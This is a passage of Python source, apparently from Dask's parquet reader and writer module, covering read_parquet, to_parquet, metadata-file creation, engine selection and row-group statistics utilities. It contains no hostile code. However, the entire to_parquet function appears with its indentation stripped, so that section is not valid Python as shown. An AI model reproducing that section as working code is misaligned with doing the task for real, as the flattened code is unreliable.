        ``False`` when there are filters.
    chunksize : int or str, default None
        The desired size of each output ``DataFrame`` partition in terms of total
        (uncompressed) parquet storage space. If specified, adjacent row-groups
        and/or files will be aggregated into the same output partition until the
        cumulative ``total_byte_size`` parquet-metadata statistic reaches this
        value. Use `aggregate_files` to enable/disable inter-file aggregation.
    aggregate_files : bool or str, default None
        Whether distinct file paths may be aggregated into the same output
        partition. This parameter requires `gather_statistics=True`, and is
        only used when `chunksize` is specified or when `split_row_groups` is
        an integer >1. A setting of True means that any two file paths may be
        aggregated into the same output partition, while False means that
        inter-file aggregation is prohibited.

        For "hive-partitioned" datasets, a "partition"-column name can also be
        specified. In this case, we allow the aggregation of any two files
        sharing a file path up to, and including, the corresponding directory name.
        For example, if ``aggregate_files`` is set to ``"section"`` for the
        directory structure below, ``03.parquet`` and ``04.parquet`` may be
        aggregated together, but ``01.parquet`` and ``02.parquet`` cannot be.
        If, however, ``aggregate_files`` is set to ``"region"``, ``01.parquet``
        may be aggregated with ``02.parquet``, and ``03.parquet`` may be aggregated
        with ``04.parquet``::

            dataset-path/
            ├── region=1/
            │   ├── section=a/
            │   │   └── 01.parquet
            │   ├── section=b/
            │   └── └── 02.parquet
            └── region=2/
                ├── section=a/
                │   ├── 03.parquet
                └── └── 04.parquet

        Note that the default behavior of ``aggregate_files`` is False.
    **kwargs: dict (of dicts)
        Passthrough key-word arguments for read backend.
        The top-level keys correspond to the appropriate operation type, and
        the second level corresponds to the kwargs that will be passed on to
        the underlying ``pyarrow`` or ``fastparquet`` function.
        Supported top-level keys: 'dataset' (for opening a ``pyarrow`` dataset),
        'file' (for opening a ``fastparquet`` ``ParquetFile``), 'read' (for the
        backend read function), 'arrow_to_pandas' (for controlling the arguments
        passed to convert from a ``pyarrow.Table.to_pandas()``)

    Examples
    --------
    >>> df = dd.read_parquet('s3://bucket/my-parquet-data')  # doctest: +SKIP

    See Also
    --------
    to_parquet
    pyarrow.parquet.ParquetDataset
    """
    # A single string in ``columns`` means "return a Series": recurse
    # with a one-element list and select that column from the result.
    if isinstance(columns, str):
        df = read_parquet(
            path,
            columns=[columns],
            filters=filters,
            categories=categories,
            index=index,
            storage_options=storage_options,
            engine=engine,
            gather_statistics=gather_statistics,
            split_row_groups=split_row_groups,
            read_from_paths=read_from_paths,
            chunksize=chunksize,
            aggregate_files=aggregate_files,
        )
        return df[columns]
    if columns is not None:
        columns = list(columns)
    label = "read-parquet-"
    # Deterministic output name: hash every argument that affects the data.
    output_name = label + tokenize(
        path,
        columns,
        filters,
        categories,
        index,
        storage_options,
        engine,
        gather_statistics,
        split_row_groups,
        read_from_paths,
        chunksize,
        aggregate_files,
    )
    if isinstance(engine, str):
        engine = get_engine(engine)
    if hasattr(path, "name"):
        path = stringify_path(path)
    fs, _, paths = get_fs_token_paths(path, mode="rb", storage_options=storage_options)
    paths = sorted(paths, key=natural_sort_key)  # numeric rather than glob ordering
    auto_index_allowed = False
    if index is None:
        # User is allowing auto-detected index
        auto_index_allowed = True
    if index and isinstance(index, str):
        index = [index]
    if chunksize or (
        split_row_groups and int(split_row_groups) > 1 and aggregate_files
    ):
        # Require `gather_statistics=True` if `chunksize` is used,
        # or if `split_row_groups>1` and we are aggregating files.
        if gather_statistics is False:
            raise ValueError("read_parquet options require gather_statistics=True")
        gather_statistics = True
    read_metadata_result = engine.read_metadata(
        fs,
        paths,
        categories=categories,
        index=index,
        gather_statistics=gather_statistics,
        filters=filters,
        split_row_groups=split_row_groups,
        read_from_paths=read_from_paths,
        chunksize=chunksize,
        aggregate_files=aggregate_files,
        **kwargs,
    )
    # In the future, we may want to give the engine the
    # option to return a dedicated element for `common_kwargs`.
    # However, to avoid breaking the API, we just embed this
    # data in the first element of `parts` for now.
    # The logic below is inteded to handle backward and forward
    # compatibility with a user-defined engine.
    meta, statistics, parts, index = read_metadata_result[:4]
    common_kwargs = {}
    aggregation_depth = False
    if len(parts):
        # For now, `common_kwargs` and `aggregation_depth`
        # may be stored in the first element of `parts`
        common_kwargs = parts[0].pop("common_kwargs", {})
        aggregation_depth = parts[0].pop("aggregation_depth", aggregation_depth)
    # Parse dataset statistics from metadata (if available)
    parts, divisions, index, index_in_columns = process_statistics(
        parts,
        statistics,
        filters,
        index,
        chunksize,
        split_row_groups,
        fs,
        aggregation_depth,
    )
    # Account for index and columns arguments.
    # Modify `meta` dataframe accordingly
    meta, index, columns = set_index_columns(
        meta, index, columns, index_in_columns, auto_index_allowed
    )
    if meta.index.name == NONE_LABEL:
        meta.index.name = None
    # Set the index that was previously treated as a column
    if index_in_columns:
        meta = meta.set_index(index)
        if meta.index.name == NONE_LABEL:
            meta.index.name = None
    if len(divisions) < 2:
        # empty dataframe - just use meta
        graph = {(output_name, 0): meta}
        divisions = (None, None)
    else:
        # Create Blockwise layer
        layer = DataFrameIOLayer(
            output_name,
            columns,
            parts,
            ParquetFunctionWrapper(
                engine,
                fs,
                meta,
                columns,
                index,
                kwargs,
                common_kwargs,
            ),
            label=label,
        )
        graph = HighLevelGraph({output_name: layer}, {output_name: set()})
    return new_dd_object(graph, output_name, meta, divisions)
def check_multi_support(engine):
    """Return whether ``engine`` supports a multi-partition read."""
    # Engines without a ``multi_support`` attribute are treated as
    # single-partition readers.
    return getattr(engine, "multi_support", lambda: False)()
def read_parquet_part(fs, engine, meta, part, columns, index, kwargs):
    """Read a part of a parquet dataset

    This function is used by `read_parquet` (via
    ``ParquetFunctionWrapper``) to materialize one output partition.
    ``part`` is either a single ``(piece, part_kwargs)`` tuple or a list
    of such tuples; ``kwargs`` are shared by every piece.
    """
    if isinstance(part, list):
        # Fall back to piece-by-piece reads when there is only one
        # piece, when the first piece carries its own kwargs, or when
        # the engine cannot read multiple pieces in one call.
        if len(part) == 1 or part[0][1] or not check_multi_support(engine):
            # Part kwargs expected
            func = engine.read_partition
            dfs = [
                func(fs, rg, columns.copy(), index, **toolz.merge(kwargs, kw))
                for (rg, kw) in part
            ]
            df = concat(dfs, axis=0) if len(dfs) > 1 else dfs[0]
        else:
            # No part specific kwargs, let engine read
            # list of parts at once
            df = engine.read_partition(
                fs, [p[0] for p in part], columns.copy(), index, **kwargs
            )
    else:
        # NOTE: `kwargs` are the same for all parts, while `part_kwargs` may
        # be different for each part.
        rg, part_kwargs = part
        df = engine.read_partition(
            fs, rg, columns, index, **toolz.merge(kwargs, part_kwargs)
        )
    if meta.columns.name:
        df.columns.name = meta.columns.name
    columns = columns or []
    index = index or []
    # Drop any index fields that slipped into the column selection.
    df = df[[c for c in columns if c not in index]]
    if index == [NONE_LABEL]:
        df.index.name = None
    return df
def to_parquet(
df,
path,
engine="auto",
compression="default",
write_index=True,
append=False,
overwrite=False,
ignore_divisions=False,
partition_on=None,
storage_options=None,
custom_metadata=None,
write_metadata_file=True,
compute=True,
compute_kwargs=None,
schema=None,
**kwargs,
):
"""Store Dask.dataframe to Parquet files
Notes
-----
Each partition will be written to a separate file.
Parameters
----------
df : dask.dataframe.DataFrame
path : string or pathlib.Path
Destination directory for data. Prepend with protocol like ``s3://``
or ``hdfs://`` for remote data.
engine : {'auto', 'fastparquet', 'pyarrow'}, default 'auto'
Parquet library to use. If only one library is installed, it will use
that one; if both, it will use 'fastparquet'.
compression : string or dict, default 'default'
Either a string like ``"snappy"`` or a dictionary mapping column names
to compressors like ``{"name": "gzip", "values": "snappy"}``. The
default is ``"default"``, which uses the default compression for
whichever engine is selected.
write_index : boolean, default True
Whether or not to write the index. Defaults to True.
append : bool, default False
If False (default), construct data-set from scratch. If True, add new
row-group(s) to an existing data-set. In the latter case, the data-set
must exist, and the schema must match the input data.
overwrite : bool, default False
Whether or not to remove the contents of `path` before writing the dataset.
The default is False. If True, the specified path must correspond to
a directory (but not the current working directory). This option cannot
be set to True if `append=True`.
NOTE: `overwrite=True` will remove the original data even if the current
write operation fails. Use at your own risk.
ignore_divisions : bool, default False
If False (default) raises error when previous divisions overlap with
the new appended divisions. Ignored if append=False.
partition_on : list, default None
Construct directory-based partitioning by splitting on these fields'
values. Each dask partition will result in one or more datafiles,
there will be no global groupby.
storage_options : dict, default None
Key/value pairs to be passed on to the file-system backend, if any.
custom_metadata : dict, default None
Custom key/value metadata to include in all footer metadata (and
in the global "_metadata" file, if applicable). Note that the custom
metadata may not contain the reserved b"pandas" key.
write_metadata_file : bool, default True
Whether to write the special "_metadata" file.
compute : bool, default True
If :obj:`True` (default) then the result is computed immediately. If :obj:`False`
then a ``dask.dataframe.Scalar`` object is returned for future computation.
compute_kwargs : dict, default True
Options to be passed in to the compute method
schema : Schema object, dict, or {"infer", None}, default None
Global schema to use for the output dataset. Alternatively, a `dict`
of pyarrow types can be specified (e.g. `schema={"id": pa.string()}`).
For this case, fields excluded from the dictionary will be inferred
from `_meta_nonempty`. If "infer", the first non-empty and non-null
partition will be used to infer the type for "object" columns. If
None (default), we let the backend infer the schema for each distinct
output partition. If the partitions produce inconsistent schemas,
pyarrow will throw an error when writing the shared _metadata file.
Note that this argument is ignored by the "fastparquet" engine.
**kwargs :
Extra options to be passed on to the specific backend.
Examples
--------
>>> df = dd.read_csv(...) # doctest: +SKIP
>>> df.to_parquet('/path/to/output/', ...) # doctest: +SKIP
See Also
--------
read_parquet: Read parquet data to dask.dataframe
"""
if compression == "default":
if snappy is not None:
compression = "snappy"
else:
compression = None
partition_on = partition_on or []
if isinstance(partition_on, str):
partition_on = [partition_on]
if set(partition_on) - set(df.columns):
raise ValueError(
"Partitioning on non-existent column. "
"partition_on=%s ."
"columns=%s" % (str(partition_on), str(list(df.columns)))
)
if isinstance(engine, str):
engine = get_engine(engine)
if hasattr(path, "name"):
path = stringify_path(path)
fs, _, _ = get_fs_token_paths(path, mode="wb", storage_options=storage_options)
# Trim any protocol information from the path before forwarding
path = fs._strip_protocol(path)
if overwrite:
if isinstance(fs, LocalFileSystem):
working_dir = fs.expand_path(".")[0]
if path.rstrip("/") == working_dir.rstrip("/"):
raise ValueError(
"Cannot clear the contents of the current working directory!"
)
if append:
raise ValueError("Cannot use both `overwrite=True` and `append=True`!")
if fs.isdir(path):
# Only remove path contents if
# (1) The path exists
# (2) The path is a directory
# (3) The path is not the current working directory
fs.rm(path, recursive=True)
# Save divisions and corresponding index name. This is necessary,
# because we may be resetting the index to write the file
division_info = {"divisions": df.divisions, "name": df.index.name}
if division_info["name"] is None:
# As of 0.24.2, pandas will rename an index with name=None
# when df.reset_index() is called. The default name is "index",
# but dask will always change the name to the NONE_LABEL constant
if NONE_LABEL not in df.columns:
division_info["name"] = NONE_LABEL
elif write_index:
raise ValueError(
"Index must have a name if __null_dask_index__ is a column."
)
else:
warnings.warn(
"If read back by Dask, column named __null_dask_index__ "
"will be set to the index (and renamed to None)."
)
# There are some "resrved" names that may be used as the default column
# name after resetting the index. However, we don't want to treat it as
# a "special" name if the string is already used as a "real" column name.
reserved_names = []
for name in ["index", "level_0"]:
if name not in df.columns:
reserved_names.append(name)
# If write_index==True (default), reset the index and record the
# name of the original index in `index_cols` (we will set the name
# to the NONE_LABEL constant if it is originally `None`).
# `fastparquet` will use `index_cols` to specify the index column(s)
# in the metadata. `pyarrow` will revert the `reset_index` call
# below if `index_cols` is populated (because pyarrow will want to handle
# index preservation itself). For both engines, the column index
# will be written to "pandas metadata" if write_index=True
index_cols = []
if write_index:
real_cols = set(df.columns)
none_index = list(df._meta.index.names) == [None]
df = df.reset_index()
if none_index:
df.columns = [
c if c not in reserved_names else NONE_LABEL for c in df.columns
]
index_cols = [c for c in set(df.columns) - real_cols]
else:
# Not writing index - might as well drop it
df = df.reset_index(drop=True)
_to_parquet_kwargs = {
"engine",
"compression",
"write_index",
"append",
"ignore_divisions",
"partition_on",
"storage_options",
"write_metadata_file",
"compute",
}
kwargs_pass = {k: v for k, v in kwargs.items() if k not in _to_parquet_kwargs}
# Engine-specific initialization steps to write the dataset.
# Possibly create parquet metadata, and load existing stuff if appending
meta, schema, i_offset = engine.initialize_write(
df,
fs,
path,
append=append,
ignore_divisions=ignore_divisions,
partition_on=partition_on,
division_info=division_info,
index_cols=index_cols,
schema=schema,
**kwargs_pass,
)
# Use i_offset and df.npartitions to define file-name list
filenames = ["part.%i.parquet" % (i + i_offset) for i in range(df.npartitions)]
# Construct IO graph
dsk = {}
name = "to-parquet-" + tokenize(
df,
fs,
path,
append,
ignore_divisions,
partition_on,
division_info,
index_cols,
schema,
)
part_tasks = []
kwargs_pass["fmd"] = meta
kwargs_pass["compression"] = compression
kwargs_pass["index_cols"] = index_cols
kwargs_pass["schema"] = schema
if custom_metadata:
if b"pandas" in custom_metadata.keys():
raise ValueError(
"User-defined key/value metadata (custom_metadata) can not "
"contain a b'pandas' key. This key is reserved by Pandas, "
"and overwriting the corresponding value can render the "
"entire dataset unreadable."
)
kwargs_pass["custom_metadata"] = custom_metadata
for d, filename in enumerate(filenames):
dsk[(name, d)] = (
apply,
engine.write_partition,
[
(df._name, d),
path,
fs,
filename,
partition_on,
write_metadata_file,
],
toolz.merge(kwargs_pass, {"head": True}) if d == 0 else kwargs_pass,
)
part_tasks.append((name, d))
final_name = "metadata-" + name
# Collect metadata and write _metadata
if write_metadata_file:
dsk[(final_name, 0)] = (
apply,
engine.write_metadata,
[
part_tasks,
meta,
fs,
path,
],
{"append": append, "compression": compression},
)
else:
dsk[(final_name, 0)] = (lambda x: None, part_tasks)
graph = HighLevelGraph.from_collections(name, dsk, dependencies=[df])
out = Scalar(graph, final_name, "")
if compute:
if compute_kwargs is None:
compute_kwargs = dict()
out = out.compute(**compute_kwargs)
return out
def create_metadata_file(
    paths,
    root_dir=None,
    out_dir=None,
    engine="pyarrow",
    storage_options=None,
    split_every=32,
    compute=True,
    compute_kwargs=None,
    fs=None,
):
    """Construct a global _metadata file from a list of parquet files.

    Dask's read_parquet function is designed to leverage a global
    _metadata file whenever one is available. The to_parquet
    function will generate this file automatically by default, but it
    may not exist if the dataset was generated outside of Dask. This
    utility provides a mechanism to generate a _metadata file from a
    list of existing parquet files.

    NOTE: This utility is not yet supported for the "fastparquet" engine.

    Parameters
    ----------
    paths : list(string)
        List of files to collect footer metadata from.
    root_dir : string, optional
        Root directory of dataset. The `file_path` fields in the new
        _metadata file will relative to this directory. If None, a common
        root directory will be inferred.
    out_dir : string or False, optional
        Directory location to write the final _metadata file. By default,
        this will be set to `root_dir`. If False is specified, the global
        metadata will be returned as an in-memory object (and will not be
        written to disk).
    engine : str or Engine, default 'pyarrow'
        Parquet Engine to use. Only 'pyarrow' is supported if a string
        is passed.
    storage_options : dict, optional
        Key/value pairs to be passed on to the file-system backend, if any.
    split_every : int, optional
        The final metadata object that is written to _metadata can be much
        smaller than the list of footer metadata. In order to avoid the
        aggregation of all metadata within a single task, a tree reduction
        is used. This argument specifies the maximum number of metadata
        inputs to be handled by any one task in the tree. Defaults to 32.
    compute : bool, optional
        If True (default) then the result is computed immediately. If False
        then a ``dask.delayed`` object is returned for future computation.
    compute_kwargs : dict, optional
        Options to be passed in to the compute method
    fs : fsspec object, optional
        File-system instance to use for file handling. If prefixes have
        been removed from the elements of ``paths`` before calling this
        function, an ``fs`` argument must be provided to ensure correct
        behavior on remote file systems ("naked" paths cannot be used
        to infer file-system information).
    """
    # Get engine.
    # Note that "fastparquet" is not yet supported
    if isinstance(engine, str):
        if engine not in ("pyarrow", "arrow"):
            raise ValueError(
                f"{engine} is not a supported engine for create_metadata_file "
                "Try engine='pyarrow'."
            )
        engine = get_engine(engine)

    # Process input path list
    if fs is None:
        # Only do this if an fsspec file-system object is not
        # already defined. The prefixes may already be stripped.
        fs, _, paths = get_fs_token_paths(
            paths, mode="rb", storage_options=storage_options
        )
    ap_kwargs = {"root": root_dir} if root_dir else {}
    paths, root_dir, fns = _sort_and_analyze_paths(paths, fs, **ap_kwargs)
    out_dir = root_dir if out_dir is None else out_dir

    # Start constructing a raw graph.
    # Task keys are tuples of (task-name, part-index, tree-depth).
    dsk = {}
    name = "gen-metadata-" + tokenize(paths, fs)
    collect_name = "collect-" + name
    agg_name = "agg-" + name

    # Define a "collect" task for each file in the input list.
    # Each tasks will:
    #   1. Extract the footer metadata from a distinct file
    #   2. Populate the `file_path` field in the metadata
    #   3. Return the extracted/modified metadata
    for p, (fn, path) in enumerate(zip(fns, paths)):
        key = (collect_name, p, 0)
        dsk[key] = (engine.collect_file_metadata, path, fs, fn)

    # Build a reduction tree to aggregate all footer metadata
    # into a single metadata object. Each task in the tree
    # will take in a list of metadata objects as input, and will
    # usually output a single (aggregated) metadata object.
    # The final task in the tree will write the result to disk
    # instead of returning it (this behavior is triggered by
    # passing a file path to `engine.aggregate_metadata`).
    parts = len(paths)
    # `widths[d]` is the number of tasks at tree depth `d`;
    # each level fans in at most `split_every` inputs per task.
    widths = [parts]
    while parts > 1:
        parts = math.ceil(parts / split_every)
        widths.append(parts)
    height = len(widths)
    for depth in range(1, height):
        for group in range(widths[depth]):
            p_max = widths[depth - 1]
            lstart = split_every * group
            lstop = min(lstart + split_every, p_max)
            # Depth-1 tasks consume collect tasks; deeper levels consume
            # the previous aggregation level.
            dep_task_name = collect_name if depth == 1 else agg_name
            node_list = [(dep_task_name, p, depth - 1) for p in range(lstart, lstop)]
            if depth == height - 1:
                # Root of the tree: writes to `out_dir` (or returns the
                # in-memory object when out_dir is False).
                assert group == 0
                dsk[name] = (engine.aggregate_metadata, node_list, fs, out_dir)
            else:
                dsk[(agg_name, group, depth)] = (
                    engine.aggregate_metadata,
                    node_list,
                    None,
                    None,
                )

    # There will be no aggregation tasks if there is only one file
    if len(paths) == 1:
        dsk[name] = (engine.aggregate_metadata, [(collect_name, 0, 0)], fs, out_dir)

    # Convert the raw graph to a `Delayed` object
    graph = HighLevelGraph.from_collections(name, dsk, dependencies=[])
    out = Delayed(name, graph)

    # Optionally compute the result
    if compute:
        if compute_kwargs is None:
            compute_kwargs = dict()
        out = out.compute(**compute_kwargs)
    return out
# Cache of engine classes already resolved by get_engine(), keyed by the
# engine-name string, so the backend imports only happen once per process.
_ENGINES = {}
def get_engine(engine):
    """Get the parquet engine backend implementation.

    Resolved engines are memoized in the module-level ``_ENGINES`` dict,
    so each backend import is performed at most once.

    Parameters
    ----------
    engine : str, default 'auto'
        Backend parquet library to use. Options include: 'auto', 'fastparquet',
        'pyarrow', 'pyarrow-dataset', and 'pyarrow-legacy'. Defaults to 'auto',
        which selects the FastParquetEngine if fastparquet is installed (and
        ArrowLegacyEngine otherwise). If 'pyarrow-dataset' is specified, the
        ArrowDatasetEngine (which leverages the pyarrow.dataset API) will be used
        for newer PyArrow versions (>=1.0.0). If 'pyarrow' or 'pyarrow-legacy' are
        specified, the ArrowLegacyEngine will be used (which leverages the
        pyarrow.parquet.ParquetDataset API).
        NOTE: 'pyarrow-dataset' enables row-wise filtering, but requires
        pyarrow>=1.0. The behavior of 'pyarrow' will most likely change to
        ArrowDatasetEngine in a future release, and the 'pyarrow-legacy'
        option will be deprecated once the ParquetDataset API is deprecated.

    Returns
    -------
    The engine class implementing the requested backend (e.g.
    ``FastParquetEngine`` or an Arrow engine class).

    Raises
    ------
    RuntimeError
        If engine='auto' and neither backend can be imported.
    ValueError
        If an unsupported engine name is given.
    """
    if engine in _ENGINES:
        return _ENGINES[engine]

    if engine == "auto":
        # Try each backend in preference order; get_engine() raises
        # RuntimeError (via import_required) when a backend is missing.
        for eng in ["fastparquet", "pyarrow"]:
            try:
                return get_engine(eng)
            except RuntimeError:
                pass
        else:
            # for/else: the loop body never breaks, so if no backend
            # returned above we always land here and report failure.
            raise RuntimeError("Please install either fastparquet or pyarrow")

    elif engine == "fastparquet":
        import_required("fastparquet", "`fastparquet` not installed")
        from .fastparquet import FastParquetEngine

        _ENGINES["fastparquet"] = eng = FastParquetEngine
        return eng

    elif engine in ("pyarrow", "arrow", "pyarrow-legacy", "pyarrow-dataset"):
        if engine == "pyarrow-dataset":
            from .arrow import ArrowDatasetEngine

            _ENGINES[engine] = eng = ArrowDatasetEngine
        else:
            # 'pyarrow', 'arrow' and 'pyarrow-legacy' all map to the
            # legacy ParquetDataset-based engine.
            from .arrow import ArrowLegacyEngine

            _ENGINES[engine] = eng = ArrowLegacyEngine
        return eng

    else:
        raise ValueError(
            'Unsupported engine: "{0}".'.format(engine)
            + ' Valid choices include "pyarrow" and "fastparquet".'
        )
#####################
# Utility Functions #
#####################
def sorted_columns(statistics):
    """Find sorted columns given row-group statistics.

    Identifies every column whose min/max ranges increase monotonically
    across the parts (i.e. the parts are globally sorted on that column),
    and computes the division boundaries implied by those ranges.

    Parameters
    ----------
    statistics : list of dict
        One statistics dict per part. Each has a ``"columns"`` list of
        ``{"name", "min", "max"}`` entries; ``min``/``max`` may be absent
        or ``None``, in which case the column is skipped.

    Returns
    -------
    out: List of {'name': str, 'divisions': List[str]} dictionaries
    """
    if not statistics:
        return []

    out = []
    for i, c in enumerate(statistics[0]["columns"]):
        # Skip columns that are missing min/max statistics in any part.
        if not all(
            "min" in s["columns"][i] and "max" in s["columns"][i] for s in statistics
        ):
            continue
        divisions = [c["min"]]
        # Track the previous part's maximum explicitly; the original code
        # named this `max`, shadowing the builtin.
        prev_max = c["max"]
        success = c["min"] is not None
        for stats in statistics[1:]:
            c = stats["columns"][i]
            if c["min"] is None:
                success = False
                break
            if c["min"] >= prev_max:
                # Ranges do not overlap: still sorted so far.
                divisions.append(c["min"])
                prev_max = c["max"]
            else:
                success = False
                break

        if success:
            divisions.append(prev_max)
            assert divisions == sorted(divisions)
            out.append({"name": c["name"], "divisions": divisions})

    return out
def apply_filters(parts, statistics, filters):
    """Apply filters onto parts/statistics pairs.

    Parameters
    ----------
    parts: list
        Tokens corresponding to row groups to read in the future
    statistics: List[dict]
        List of statistics for each part, including min and max values
    filters: Union[List[Tuple[str, str, Any]], List[List[Tuple[str, str, Any]]]]
        List of filters to apply, like ``[[('x', '=', 0), ...], ...]``. This
        implements partition-level (hive) filtering only, i.e., to prevent the
        loading of some row-groups and/or files.

        Predicates can be expressed in disjunctive normal form (DNF). This means
        that the innermost tuple describes a single column predicate. These
        inner predicates are combined with an AND conjunction into a larger
        predicate. The outer-most list then combines all of the combined
        filters with an OR disjunction.

        Predicates can also be expressed as a List[Tuple]. These are evaluated
        as an AND conjunction. To express OR in predicates, one must use the
        (preferred) List[List[Tuple]] notation.

        Note that the "fastparquet" engine does not currently support DNF for
        the filtering of partitioned columns (List[Tuple] is required).

    Returns
    -------
    parts, statistics: the same as the input, but possibly a subset
    """

    def apply_conjunction(parts, statistics, conjunction):
        # Narrow parts/statistics by each column predicate in turn (AND).
        for column, operator, value in conjunction:
            out_parts = []
            out_statistics = []
            for part, stats in zip(parts, statistics):
                if "filter" in stats and stats["filter"]:
                    continue  # Filtered by engine
                try:
                    # First stats entry for this column. A missing column
                    # (or missing min/max) raises KeyError and the part is
                    # kept, since there is nothing to filter on.
                    by_name = {}
                    for col in stats["columns"]:
                        by_name.setdefault(col["name"], col)
                    col_stats = by_name[column]
                    col_min = col_stats["min"]
                    col_max = col_stats["max"]
                except KeyError:
                    out_parts.append(part)
                    out_statistics.append(stats)
                else:
                    # Keep the part when its [min, max] range can satisfy
                    # the predicate. (Renamed from `min`/`max` to avoid
                    # shadowing the builtins.)
                    if (
                        operator == "=="
                        and col_min <= value <= col_max
                        or operator == "<"
                        and col_min < value
                        or operator == "<="
                        and col_min <= value
                        or operator == ">"
                        and col_max > value
                        or operator == ">="
                        and col_max >= value
                        or operator == "in"
                        and any(col_min <= item <= col_max for item in value)
                    ):
                        out_parts.append(part)
                        out_statistics.append(stats)

            parts, statistics = out_parts, out_statistics

        return parts, statistics

    # Normalize List[Tuple] input into a single-conjunction DNF.
    conjunction, *disjunction = filters if isinstance(filters[0], list) else [filters]

    out_parts, out_statistics = apply_conjunction(parts, statistics, conjunction)
    # OR the remaining conjunctions together, de-duplicating parts.
    for conjunction in disjunction:
        for part, stats in zip(*apply_conjunction(parts, statistics, conjunction)):
            if part not in out_parts:
                out_parts.append(part)
                out_statistics.append(stats)

    return out_parts, out_statistics
def process_statistics(
    parts,
    statistics,
    filters,
    index,
    chunksize,
    split_row_groups,
    fs,
    aggregation_depth,
):
    """Process row-group column statistics in metadata.

    Used in read_parquet. Drops empty parts, applies ``filters``,
    optionally coalesces parts by chunksize/row-group criteria, and then
    tries to derive divisions (and possibly the index column) from
    sorted-column statistics.

    Returns
    -------
    parts, divisions, index, index_in_columns
        ``index_in_columns`` is True when an auto-detected index column
        must still be read as a regular column.
    """
    index_in_columns = False
    if statistics:
        # Drop parts with zero rows; their stats carry no useful bounds.
        result = list(
            zip(
                *[
                    (part, stats)
                    for part, stats in zip(parts, statistics)
                    if stats["num-rows"] > 0
                ]
            )
        )
        parts, statistics = result or [[], []]

        if filters:
            parts, statistics = apply_filters(parts, statistics, filters)

        # Aggregate parts/statistics if we are splitting by row-group
        if chunksize or (split_row_groups and int(split_row_groups) > 1):
            parts, statistics = aggregate_row_groups(
                parts, statistics, chunksize, split_row_groups, fs, aggregation_depth
            )

        # Columns that are globally sorted across parts (candidates for
        # the index, since they yield usable divisions).
        out = sorted_columns(statistics)

        if index and isinstance(index, str):
            index = [index]
        if index and out:
            # Only one valid column
            out = [o for o in out if o["name"] in index]

        if index is not False and len(out) == 1:
            # Use only sorted column with statistics as the index
            divisions = out[0]["divisions"]
            if index is None:
                index_in_columns = True
                index = [out[0]["name"]]
            elif index != [out[0]["name"]]:
                raise ValueError("Specified index is invalid.\nindex: {}".format(index))
        elif index is not False and len(out) > 1:
            if any(o["name"] == NONE_LABEL for o in out):
                # Use sorted column matching NONE_LABEL as the index
                [o] = [o for o in out if o["name"] == NONE_LABEL]
                divisions = o["divisions"]
                if index is None:
                    index = [o["name"]]
                    index_in_columns = True
                elif index != [o["name"]]:
                    raise ValueError(
                        "Specified index is invalid.\nindex: {}".format(index)
                    )
            else:
                # Multiple sorted columns found, cannot autodetect the index
                warnings.warn(
                    "Multiple sorted columns found %s, cannot\n "
                    "autodetect index. Will continue without an index.\n"
                    "To pick an index column, use the index= keyword; to \n"
                    "silence this warning use index=False."
                    "" % [o["name"] for o in out],
                    RuntimeWarning,
                )
                index = False
                divisions = [None] * (len(parts) + 1)
        else:
            # No usable sorted column (or index=False): unknown divisions.
            divisions = [None] * (len(parts) + 1)
    else:
        divisions = [None] * (len(parts) + 1)

    return parts, divisions, index, index_in_columns
def set_index_columns(meta, index, columns, index_in_columns, auto_index_allowed):
    """Resolve the index/columns arguments and trim ``meta`` accordingly.

    Used in read_parquet. Returns the (possibly column-reduced) ``meta``
    frame together with the normalized ``index`` and ``columns`` values.
    """
    auto_columns = columns is None
    if auto_columns:
        # User didn't specify columns: auto-detect them from meta, but
        # exclude "un-named" fields (intended as un-named indices at
        # write time) unless they were explicitly requested as the index.
        wanted_index = index or []
        columns = [
            c for c in meta.columns if c not in (None, NONE_LABEL) or c in wanted_index
        ]

    if not set(columns).issubset(set(meta.columns)):
        raise ValueError(
            "The following columns were not found in the dataset %s\n"
            "The following columns were found %s"
            % (set(columns) - set(meta.columns), meta.columns)
        )

    if not index:
        return meta[list(columns)], index, columns

    index = [index] if isinstance(index, str) else index
    columns = [columns] if isinstance(columns, str) else columns

    if auto_columns:
        # Auto-detected columns may overlap the index; drop those.
        columns = [col for col in columns if col not in index]

    if set(index).intersection(columns):
        if auto_index_allowed:
            raise ValueError(
                "Specified index and column arguments must not intersect"
                " (set index=False or remove the detected index from columns).\n"
                "index: {} | column: {}".format(index, columns)
            )
        raise ValueError(
            "Specified index and column arguments must not intersect.\n"
            "index: {} | column: {}".format(index, columns)
        )

    # Keep the index as a column in `meta` when it was detected after
    # meta was created; the caller resets the index later.
    selection = columns + index if index_in_columns else columns
    return meta[selection], index, columns
def aggregate_row_groups(
    parts, stats, chunksize, split_row_groups, fs, aggregation_depth
):
    """Coalesce adjacent parts (row-groups) into larger output partitions.

    Neighboring parts are merged when they satisfy a path/aggregation-depth
    criterion AND either the row-group-count or byte-size criterion.
    Statistics of merged parts are combined (sizes/row counts summed,
    column min/max widened). Returns the aggregated (parts, stats) lists.
    """
    if not stats[0].get("file_path_0", None):
        # Without per-part file paths we cannot reason about adjacency.
        return parts, stats

    parts_agg = []
    stats_agg = []
    use_row_group_criteria = split_row_groups and int(split_row_groups) > 1
    use_chunksize_criteria = bool(chunksize)
    if use_chunksize_criteria:
        chunksize = parse_bytes(chunksize)
    # Running merge candidate: list of merged parts + combined stats.
    next_part, next_stat = [parts[0].copy()], stats[0].copy()
    for i in range(1, len(parts)):
        stat, part = stats[i], parts[i]

        # Criteria #1 for aggregating parts: parts are within the same file
        same_path = stat["file_path_0"] == next_stat["file_path_0"]
        multi_path_allowed = False

        if aggregation_depth:
            # Criteria #2 for aggregating parts: The part does not include
            # row-group information, or both parts include the same kind
            # of row_group aggregation (all None, or all indices)
            multi_path_allowed = len(part["piece"]) == 1
            if not (same_path or multi_path_allowed):
                rgs = set(list(part["piece"][1]) + list(next_part[-1]["piece"][1]))
                multi_path_allowed = (rgs == {None}) or (None not in rgs)

            # Criteria #3 for aggregating parts: The parts share a
            # directory at the "depth" allowed by `aggregation_depth`
            if not same_path and multi_path_allowed:
                if aggregation_depth is True:
                    # Any directory depth is acceptable.
                    multi_path_allowed = True
                elif isinstance(aggregation_depth, int):
                    # Make sure files share the same directory
                    root = stat["file_path_0"].split(fs.sep)[:-aggregation_depth]
                    next_root = next_stat["file_path_0"].split(fs.sep)[
                        :-aggregation_depth
                    ]
                    multi_path_allowed = root == next_root
                else:
                    raise ValueError(
                        f"{aggregation_depth} not supported for `aggregation_depth`"
                    )

        def _check_row_group_criteria(stat, next_stat):
            # True when the merged row-group count stays within the
            # requested split_row_groups limit.
            if use_row_group_criteria:
                return (next_stat["num-row-groups"] + stat["num-row-groups"]) <= int(
